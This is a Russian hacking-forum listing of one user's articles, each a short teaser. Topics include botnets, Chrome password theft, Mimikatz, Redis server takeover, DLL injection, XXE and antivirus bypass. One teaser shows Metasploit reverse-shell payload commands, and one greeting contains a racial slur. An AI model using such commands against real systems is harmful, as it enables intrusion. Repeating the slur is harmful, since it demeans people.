• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь. Мобильный клиент для IOS находится в itunes по этой ссылке

soolfaa

  1. SooLFaa

    Статья Ломаем 1С

    Здарова, арестанты. Давненько Вы не слышали звук гласа моего. Посему расскажу я Вам сегодня: "Как нам ломать 1С". Для начала немного теории. 1С - бухгалтерский огромный комбайн ориентированный на автоматизацию работы бизнеса. Есть куча различных версий и библиотек. Есть два основных...
  2. SooLFaa

    Методологии пентеста

    Да прибудет с Вами сила. Вот с чем я пришел к вам, мои лапочки. Как у кодера, так и у хекера тоже есть свои уровни развития: Уровень 1. Ничего не знает, но хочет все хекать; Уровень 2. Думает что уже что то знает, но не знает, что ему надо хекать, Уровень 3. Что то уже знает, Что то уже может...
  3. SooLFaa

    Статья Windows Exploit Suggester - тулза для фингерпринтинга виндовых тачек

    What's Up, Nigger's. И напоследок перед сном подкину вам клевую тулзу для фингерпринтинга виндовых тачек. Сразу к делу..... Задача узнать версию машины и получить и подобрать хорошие сплоиты. Для этого нам поможет скрипт взяты вот отсюда: git clone...
  4. SooLFaa

    Статья Автоматизируем работу с w3af

    Здрав будь, люд хекерский. Сегодня, поведаю я вам, как можно сделать автоматический пентест средствами w3af api. Напомню, что это достаточно неплохой фаззер. По мере развития этого скрипта буду обновлять этот топик. А пока код автоматический запускает api, сканирует с заданным профилем...
  5. SooLFaa

    Ох уж этот Mimikatz

    Ну что братцы, пора звать кавалерию?! И снова я приветствую Вас. Сегодня мы поговорим о небольшом в каком - то смысле, но очень мощном постэксплуатационном фреймворке Mimikatz. Cсылочка на вики: https://github.com/gentilkiwi/mimikatz/wiki Ссылочка где ещё почитать...
  6. SooLFaa

    Статья Хекаем сайтики через Redis

    Как жизнь, Амигос?! Пока пилю мега статью про мимикатц, решил подкинуть Вам немного не мало, инфу о том как можно хекнуть сервер с помощью одного только Redis'a и Apache. Поехали. Для того, чтобы похекать сервак с помощью открытой редиски, нужно сделать всего чуть - чуть действий: Сначала...
  7. SooLFaa

    Meterpreter(Metasploit) - Windows модули

    Здравия желаю, дамы господа. О чём поговорим сегодня? МЕТЕРПРЕТЕР Для тех кто не вкурсе это очень большой шеллкод с кучей возможностей и сегодня мы рассмотрим, что умеет метерпретер для Windows машин. Так же отсылаю Вас в свою тему про метасплоит где Вы познакомитесь с некоторыми общими...
  8. SooLFaa

    Статья Metasploit

    Моя Статья Форк с Ачата, но так как часто к ней обращаюсь, хочу сюда форкнуть [HIDE=100]www.antichat.ru Всем привет. Пришлось позаморачиваться с метасплоитом и решил сделать несколько заметочек. Я не буду в миллионный раз повторять, то, что уже написано на форуме о метасплоите. Что это почитать...
  9. SooLFaa

    Взлом и нападение: аудит веб-приложений и техники атаки

    При поддержке площадки geekbrains и форума Codeby будет проведен вебинар от меня :) Ссылка на ивент https://geekbrains.ru/events/498 Если Вы нашли как минимум 5 незнакомых слов из списка ниже, то милости прошу, иначе врядли что то новое вы узнаете. Как раз по этой причине я временно выпал из...
  10. SooLFaa

    Статья Воруем пароли из Google Chrome

    Ave Caesars, morituri te salutant! И снова здрасте. Почему я вспомнил Цезаря? Потому что как гладиаторы, что бились во имя его, мы сегодня пойдем в борьбу за пароли гугл хрома во славу Хека. Как и в любой моей статье будет личный профит и разработка. Ну обо всем по порядку…….. Итак, что мы...
  11. SooLFaa

    Статья Создаем ботнет часть 2.

    Часть 2 Буэнас Диас Эль мучачас. Вы ждали, и Вы дождались. Наконец то вторая часть про ботнетик. В первой части мы создали каркас, я бы сказал заготовку, но она достаточно сырая, толком не рабочая. Сразу оговорюсь на счет того, что я не копирую свой код из рабочего продукта, а пишу новый, для...
  12. SooLFaa

    Имитация взлома или как обманывают хекеры вконтакте

    Вечер в хату, Арестанты. Приветствую вас господа. Попросил меня мой хороший товарищ, значится, написать такую программулину, которая будет менять вёрстку в браузере на лету, дабы похвастаться перед друзьями сколько много у него денег на счету или обмануть каких - нибудь людей "взломом вк"...
  13. SooLFaa

    Статья DLL Injection

    Привет господа форумчане. Давненько я не писал, но ничего страшного, скоро решатся пара бытовых проблем и выпуск статей нормализуется по 2 - 3 в неделю. А сегодня, мы поговорим немного не мало о технике DLL Инъекций и рассмотрим пару примеров. Итак что такое DLL Инъекция? Это тип атаки...
  14. SooLFaa

    Статья XXE

    И снова всем привет. А сегодня будет разговор об XXE – атаках, что это, почему, зачем, а главное посмотрим нагрузки и пример в .Net приложениях. Идея уязвимости в том, что мы используем внешние сущности при парсинге xml файлов, рассмотрим сразу пример. Создадим файл index.php у себя на...
  15. SooLFaa

    Статья Создаем свой ботнет

    Часть 1 Часть 2 находится тут Добрый вечер господа. Сегодня я хотел бы поговорить не о взломе в чистом виде. Я думаю пришло время нам с Вами создать собственный БОТНЕТ. Эта тема, является не новой, но я бы хотел обратить внимание на то как именно начать создавать ботнет. Я уже являюсь...
  16. SooLFaa

    Статья AV ByPass с помощью C#

    Привет. Господа хекеры. Рассмотрим вариант байпасса антивирусов с помощью языка C#. Обо всё предлагаю по порядку и для начала сгенерируем полезную нагрузку в метасплоите. use windows/meterpreter/reverse_tcp Устанавливаем опции set LHOST 192.168.1.237 set LPORT 1338 set EXITFUNC thread И...
  17. SooLFaa

    Поднимаем свой хекерский маленький сервер

    Приветствую Вас господа, сегодня мы поговорим о вечном. А именно как создать маленькую станцию для хека всего за 6000р. Собственно, начнем с основ и разберемся для чего нам это надо: 1) Неудобно каждый раз пускать виртуалку; 2) Меньше нагрузка для поддержки двух систем; 3) Возможность...
  18. SooLFaa

    Площадки для хекеров

    Площадки где можно поскилять свои навыки Рассмотрим наиболее известные площадки и дистрибутивы для хекеров. Идея таких площадок - это отличная концентрация актуальных уязвимостей собранных в одном месте. Однако, совет новичкам НЕ СТОИТ С ГОЛОВОЙ браться за всё и сразу и стараться решить, как...
Вверх Снизу